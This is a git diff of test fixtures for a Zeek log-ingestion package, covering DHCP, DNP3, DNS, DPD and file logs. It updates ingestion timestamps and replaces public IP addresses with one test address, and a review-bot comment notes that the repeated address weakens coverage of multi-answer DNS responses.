 "original": "{\"ts\":1476605498.771847,\"uids\":[\"CmWOt6VWaNGqXYcH6\",\"CLObLo4YHn0u23Tp8a\"],\"client_addr\":\"192.168.199.132\",\"server_addr\":\"192.168.199.254\",\"mac\":\"00:0c:29:03:df:ad\",\"host_name\":\"DESKTOP-2AEFM7G\",\"client_fqdn\":\"DESKTOP-2AEFM7G\",\"domain\":\"localdomain\",\"requested_addr\":\"192.168.199.132\",\"assigned_addr\":\"192.168.199.132\",\"lease_time\":1800.0,\"msg_types\":[\"REQUEST\",\"ACK\"],\"duration\":0.000161}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json
index 51dba040150..d9c25a2dd6d 100644
--- a/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json
+++ b/packages/zeek/data_stream/dnp3/_dev/test/pipeline/test-dnp3.log-expected.json
@@ -29,7 +29,7 @@
 "ip": "127.0.0.1"
 },
 "event": {
- "ingested": "2021-08-11T19:18:24.752747600Z",
+ "ingested": "2021-12-09T13:50:59.129296Z",
 "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -98,7 +98,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:24.752760Z",
+ "ingested": "2021-12-09T13:50:59.129299400Z",
 "original": "{\"ts\":1227729908.705944,\"uid\":\"CQV6tj1w1t4WzQpHoe\",\"id.orig_h\":\"127.0.0.1\",\"id.orig_p\":42942,\"id.resp_h\":\"127.0.0.1\",\"id.resp_p\":20000,\"fc_request\":\"READ\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log
index 26ffabc9a4a..a3a633526de 100644
--- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log
+++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log
@@ -1,8 +1,8 @@
-{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","35.199.178.4"],"TTLs":[119.0,119.0,59.0],"rejected":false}
+{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","89.160.20.156"],"TTLs":[119.0,119.0,59.0],"rejected":false}
 {"ts":1567095830.680046,"uid":"C19a1k4lTv46YMbeOk","id.orig_h":"fe80::4ef:15cf:769f:ff21","id.orig_p":5353,"id.resp_h":"ff02::fb","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","qclass":1,"qclass_name":"C_INTERNET","qtype":12,"qtype_name":"PTR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false}
 {"ts":1567095830.734329,"uid":"CdiVAw7jJw6gsX5H","id.orig_h":"192.168.86.237","id.orig_p":5353,"id.resp_h":"224.0.0.251","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","rcode":0,"rcode_name":"NOERROR","AA":true,"TC":false,"RD":false,"RA":false,"Z":0,"answers":["bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local"],"TTLs":[120.0],"rejected":false}
-{"ts":1617105592.091052,"uid":"CpwXdW4LQaJkaIgpk","id.orig_h":"10.156.0.2","id.orig_p":33438,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58036,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[13.0,18.0,8.0],"rejected":false}
+{"ts":1617105592.091052,"uid":"CpwXdW4LQaJkaIgpk","id.orig_h":"10.156.0.2","id.orig_p":33438,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58036,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[13.0,18.0,8.0],"rejected":false}
 {"ts":1617105592.973919,"uid":"CO5TE748RoJEZuOThl","id.orig_h":"10.156.0.2","id.orig_p":60444,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":35744,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.akadns.net"],"TTLs":[296.0,287.0,287.0],"rejected":false}
-{"ts":1617105592.9742,"uid":"CG1jsmeHcBCGnWXmk","id.orig_h":"10.156.0.2","id.orig_p":44310,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58458,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","20.190.159.132","40.126.31.143","20.190.159.134","40.126.31.1","20.190.159.136","40.126.31.135","40.126.31.6","20.190.159.138"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false}
-{"ts":1617105593.106256,"uid":"ChP0cl4j5mbXSZ9TGf","id.orig_h":"10.156.0.2","id.orig_p":36364,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":8791,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[12.0,17.0,7.0],"rejected":false}
+{"ts":1617105592.9742,"uid":"CG1jsmeHcBCGnWXmk","id.orig_h":"10.156.0.2","id.orig_p":44310,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58458,"query":"login.microsoftonline.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["a.privatelink.msidentity.com","prda.aadg.msidentity.com","www.tm.a.prd.aadg.trafficmanager.net","89.160.20.156","40.126.31.143","89.160.20.156","40.126.31.1","89.160.20.156","40.126.31.135","40.126.31.6","89.160.20.156"],"TTLs":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],"rejected":false}
+{"ts":1617105593.106256,"uid":"ChP0cl4j5mbXSZ9TGf","id.orig_h":"10.156.0.2","id.orig_p":36364,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":8791,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[12.0,17.0,7.0],"rejected":false}
{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/dns.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}}
diff --git a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json
index 181b6643b21..4f55d3cd81c 100644
--- a/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json
+++ b/packages/zeek/data_stream/dns/_dev/test/pipeline/test-dns.log-expected.json
@@ -8,7 +8,7 @@
 },
 "dns": {
 "resolved_ip": [
- "35.199.178.4"
+ "89.160.20.156"
 ],
 "response_code": "NOERROR",
 "question": {
@@ -29,7 +29,7 @@
 "ttl": 119
 },
 {
- "data": "35.199.178.4",
+ "data": "89.160.20.156",
 "ttl": 59
 }
 ],
@@ -56,7 +56,7 @@
 "answers": [
 "proxy-production-us-west1.gcp.cloud.es.io",
 "proxy-production-us-west1-v1-009.gcp.cloud.es.io",
- "35.199.178.4"
+ "89.160.20.156"
 ],
 "trans_id": "15209",
 "rcode": 0,
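Review bot: On the replaced `login.microsoftonline.com` record (old lines 6-7 of test-dns.log) the four distinct Azure answers 20.190.159.132/.134/.136/.138 all become the same 89.160.20.156, so the new fixture carries one A record four times and no longer exercises a multi-address response producing distinct `resolved_ip` entries; the answers on lines 1 and 4 reuse that same address too, so every geo/AS enrichment in this data stream is now checked against a single lookup result. If the supported test-address subset offers more than one address, using a different one for each replaced answer (keeping the `40.126.31.x` entries as they are) would preserve the original shape of the response; if it does not, a one-line note in the PR description saying the answers were intentionally collapsed would stop the next reader from treating the duplicates as a parsing bug. I am inferring the single-address choice from this hunk alone; the rationale for the subset is not visible here.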
@@ -94,8 +94,8 @@
 },
 "event": {
 "duration": 7.6967E7,
- "ingested": "2021-08-11T19:18:25.340416200Z",
- "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"35.199.178.4\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}",
+ "ingested": "2021-12-09T13:50:59.483477600Z",
+ "original": "{\"ts\":1547188415.857497,\"uid\":\"CAcJw21BbVedgFnYH3\",\"id.orig_h\":\"192.168.86.167\",\"id.orig_p\":38339,\"id.resp_h\":\"192.168.86.1\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":15209,\"rtt\":0.076967,\"query\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":1,\"qtype_name\":\"A\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":true,\"RA\":true,\"Z\":0,\"answers\":[\"proxy-production-us-west1.gcp.cloud.es.io\",\"proxy-production-us-west1-v1-009.gcp.cloud.es.io\",\"89.160.20.156\"],\"TTLs\":[119.0,119.0,59.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CAcJw21BbVedgFnYH3",
@@ -164,7 +164,7 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340431700Z",
+ "ingested": "2021-12-09T13:50:59.483485800Z",
 "original": "{\"ts\":1567095830.680046,\"uid\":\"C19a1k4lTv46YMbeOk\",\"id.orig_h\":\"fe80::4ef:15cf:769f:ff21\",\"id.orig_p\":5353,\"id.resp_h\":\"ff02::fb\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"qclass\":1,\"qclass_name\":\"C_INTERNET\",\"qtype\":12,\"qtype_name\":\"PTR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -245,7 +245,7 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340436800Z",
+ "ingested": "2021-12-09T13:50:59.483491400Z",
 "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -269,7 +269,7 @@
 },
 "dns": {
 "resolved_ip": [
- "51.116.158.62"
+ "89.160.20.156"
 ],
 "response_code": "NOERROR",
 "question": {
@@ -288,7 +288,7 @@
 "ttl": 18
 },
 {
- "data": "51.116.158.62",
+ "data": "89.160.20.156",
 "ttl": 8
 }
 ],
@@ -312,7 +312,7 @@
 "answers": [
 "manage.office.com.trafficmanager.net",
 "o365adtapiproddeu001.cloudapp.net",
- "51.116.158.62"
+ "89.160.20.156"
 ],
 "trans_id": "58036",
 "rcode": 0,
@@ -346,8 +346,8 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340440300Z",
- "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"51.116.158.62\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}",
+ "ingested": "2021-12-09T13:50:59.483496800Z",
+ "original": "{\"ts\":1617105592.091052,\"uid\":\"CpwXdW4LQaJkaIgpk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":33438,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58036,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[13.0,18.0,8.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CpwXdW4LQaJkaIgpk",
@@ -445,7 +445,7 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340446100Z",
+ "ingested": "2021-12-09T13:50:59.483502200Z",
 "original": "{\"ts\":1617105592.973919,\"uid\":\"CO5TE748RoJEZuOThl\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":60444,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":35744,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.akadns.net\"],\"TTLs\":[296.0,287.0,287.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -469,14 +469,14 @@
 },
 "dns": {
 "resolved_ip": [
- "20.190.159.132",
+ "89.160.20.156",
 "40.126.31.143",
- "20.190.159.134",
+ "89.160.20.156",
 "40.126.31.1",
- "20.190.159.136",
+ "89.160.20.156",
 "40.126.31.135",
 "40.126.31.6",
- "20.190.159.138"
+ "89.160.20.156"
 ],
 "response_code": "NOERROR",
 "question": {
@@ -499,7 +499,7 @@
 "ttl": 243
 },
 {
- "data": "20.190.159.132",
+ "data": "89.160.20.156",
 "ttl": 243
 },
 {
@@ -507,7 +507,7 @@
 "ttl": 243
 },
 {
- "data": "20.190.159.134",
+ "data": "89.160.20.156",
 "ttl": 243
 },
 {
@@ -515,7 +515,7 @@
 "ttl": 243
 },
 {
- "data": "20.190.159.136",
+ "data": "89.160.20.156",
 "ttl": 243
 },
 {
@@ -527,7 +527,7 @@
 "ttl": 243
 },
 {
- "data": "20.190.159.138",
+ "data": "89.160.20.156",
 "ttl": 243
 }
 ],
@@ -560,14 +560,14 @@
 "a.privatelink.msidentity.com",
 "prda.aadg.msidentity.com",
 "www.tm.a.prd.aadg.trafficmanager.net",
- "20.190.159.132",
+ "89.160.20.156",
 "40.126.31.143",
- "20.190.159.134",
+ "89.160.20.156",
 "40.126.31.1",
- "20.190.159.136",
+ "89.160.20.156",
 "40.126.31.135",
 "40.126.31.6",
- "20.190.159.138"
+ "89.160.20.156"
 ],
 "trans_id": "58458",
 "rcode": 0,
@@ -601,8 +601,8 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340451500Z",
- "original": "{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"20.190.159.132\",\"40.126.31.143\",\"20.190.159.134\",\"40.126.31.1\",\"20.190.159.136\",\"40.126.31.135\",\"40.126.31.6\",\"20.190.159.138\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}",
+ "ingested": "2021-12-09T13:50:59.483507600Z",
+ "original": "{\"ts\":1617105592.9742,\"uid\":\"CG1jsmeHcBCGnWXmk\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":44310,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":58458,\"query\":\"login.microsoftonline.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"a.privatelink.msidentity.com\",\"prda.aadg.msidentity.com\",\"www.tm.a.prd.aadg.trafficmanager.net\",\"89.160.20.156\",\"40.126.31.143\",\"89.160.20.156\",\"40.126.31.1\",\"89.160.20.156\",\"40.126.31.135\",\"40.126.31.6\",\"89.160.20.156\"],\"TTLs\":[299.0,214.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0,243.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "CG1jsmeHcBCGnWXmk",
@@ -625,7 +625,7 @@
 },
 "dns": {
 "resolved_ip": [
- "51.116.158.62"
+ "89.160.20.156"
 ],
 "response_code": "NOERROR",
 "question": {
@@ -644,7 +644,7 @@
 "ttl": 17
 },
 {
- "data": "51.116.158.62",
+ "data": "89.160.20.156",
 "ttl": 7
 }
 ],
@@ -668,7 +668,7 @@
 "answers": [
 "manage.office.com.trafficmanager.net",
 "o365adtapiproddeu001.cloudapp.net",
- "51.116.158.62"
+ "89.160.20.156"
 ],
 "trans_id": "8791",
 "rcode": 0,
@@ -702,8 +702,8 @@
 ]
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340458500Z",
- "original": "{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"51.116.158.62\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}",
+ "ingested": "2021-12-09T13:50:59.483513Z",
+ "original": "{\"ts\":1617105593.106256,\"uid\":\"ChP0cl4j5mbXSZ9TGf\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":36364,\"id.resp_h\":\"169.254.169.254\",\"id.resp_p\":53,\"proto\":\"udp\",\"trans_id\":8791,\"query\":\"manage.office.com\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":false,\"TC\":false,\"RD\":false,\"RA\":true,\"Z\":0,\"answers\":[\"manage.office.com.trafficmanager.net\",\"o365adtapiproddeu001.cloudapp.net\",\"89.160.20.156\"],\"TTLs\":[12.0,17.0,7.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
 "id": "ChP0cl4j5mbXSZ9TGf",
@@ -791,7 +791,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:25.340467500Z",
+ "ingested": "2021-12-09T13:50:59.483518400Z",
 "original": "{\"ts\":1567095830.734329,\"uid\":\"CdiVAw7jJw6gsX5H\",\"id.orig_h\":\"192.168.86.237\",\"id.orig_p\":5353,\"id.resp_h\":\"224.0.0.251\",\"id.resp_p\":5353,\"proto\":\"udp\",\"trans_id\":0,\"query\":\"_googlecast._tcp.local\",\"rcode\":0,\"rcode_name\":\"NOERROR\",\"AA\":true,\"TC\":false,\"RD\":false,\"RA\":false,\"Z\":0,\"answers\":[\"bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local\"],\"TTLs\":[120.0],\"rejected\":false}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json
index 4f55320b2a5..7471188fd29 100644
--- a/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json
+++ b/packages/zeek/data_stream/dpd/_dev/test/pipeline/test-dpd.log-expected.json
@@ -29,7 +29,7 @@
 "ip": "192.168.10.31"
 },
 "event": {
- "ingested": "2021-08-11T19:18:26.417335800Z",
+ "ingested": "2021-12-09T13:51:00.428784900Z",
 "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
@@ -94,7 +94,7 @@
 "name": "Lees-MBP.localdomain"
 },
 "event": {
- "ingested": "2021-08-11T19:18:26.417347Z",
+ "ingested": "2021-12-09T13:51:00.428792700Z",
 "original": "{\"ts\":1507567500.423033,\"uid\":\"CRrT7S1ccw9H6hzCR\",\"id.orig_h\":\"192.168.10.31\",\"id.orig_p\":49285,\"id.resp_h\":\"192.168.10.10\",\"id.resp_p\":445,\"proto\":\"tcp\",\"analyzer\":\"DCE_RPC\",\"failure_reason\":\"Binpac exception: binpac exception: \\u0026enforce violation : DCE_RPC_Header:rpc_vers\"}",
 "created": "2020-04-28T11:07:58.223Z",
 "kind": "event",
diff --git a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log
index 431426e874d..badcd999569 100644
--- a/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log
+++ b/packages/zeek/data_stream/files/_dev/test/pipeline/test-files.log
@@ -1,9 +1,9 @@
-{"ts":1547688796.636812,"fuid":"FMkioa222mEuM2RuQ9","tx_hosts":["35.199.178.4"],"rx_hosts":["10.178.98.102"],"conn_uids":["C8I0zn3r9EPbfLgta6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":947,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"79e4a9840d7d3a96d7c04fe2434c892e","sha1":"a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c5436"}
-{"ts":1547688801.566262,"fuid":"FShtIS1gydeSFf8M63","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":2089,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"b9742f12eb97eff531d94f7800c6706c","sha1":"b88d13fe319d342e7a808ce3a0a1158111fc3c2a"}
-{"ts":1547688801.566262,"fuid":"F9ip9a3MDAq3XLBOn2","tx_hosts":["17.134.127.250"],"rx_hosts":["10.178.98.102"],"conn_uids":["C6sjVo23iNApLnlAt6"],"source":"SSL","depth":0,"analyzers":["X509","MD5","SHA1"],"mime_type":"application/pkix-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":1092,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"48f0e38385112eeca5fc9ffd402eaecd","sha1":"8e8321ca08b08e3726fe1d82996884eeb5f0d655"}
-{"ts":1617069763.671838,"fuid":"Fe722V1qt2DSlqCiOa","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["ClG5ErV7bkgKgOaV"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
-{"ts":1617069773.678327,"fuid":"FYszs61e8hIUWMWgL5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["CaB3fq3yLrKCbYLqr4"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
-{"ts":1617069783.678588,"fuid":"FdGWZq2wRIvCfjvdI5","tx_hosts":["104.154.89.105"],"rx_hosts":["10.156.0.2"],"conn_uids":["C0vhl91PPOI7LbrPZ8"],"source":"SSL","depth":0,"analyzers":["X509","SHA256","SHA1","MD5"],"mime_type":"application/x-x509-user-cert","duration":0.0,"local_orig":false,"is_orig":false,"seen_bytes":893,"missing_bytes":0,"overflow_bytes":0,"timedout":false,"md5":"5abbc8a9137f6924861596848b7d7794","sha1":"99c1daf07c8d69a8a065492dcaae43c43ff13497","sha256":"1de4074b4e38377f4367303f4a19c986a506180f22a6e53a68cc7679ea6d9c74"}
